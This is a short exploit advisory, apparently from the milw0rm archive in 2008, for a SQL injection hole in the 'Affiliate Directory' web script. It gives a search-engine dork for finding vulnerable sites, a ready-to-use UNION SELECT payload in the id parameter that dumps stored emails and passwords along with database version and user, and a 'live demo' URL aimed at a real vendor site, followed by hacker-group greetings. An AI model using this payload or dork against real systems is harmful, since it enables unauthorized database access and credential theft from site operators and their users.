|___________________________________________________| | | Affiliate Directory ( id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | | script : http://scripts-for-sites.com/item.php?item=107 | | DorK : "Copyright 2005 Affiliate Directory" |___________________________________________________| Exploit: www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- L!VE DEMO: : http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- ____________________________( Greetz )____________________________ | | tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | | | jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n |_________________________________________________________________ Im IRAQi # milw0rm.com [2008-08-19]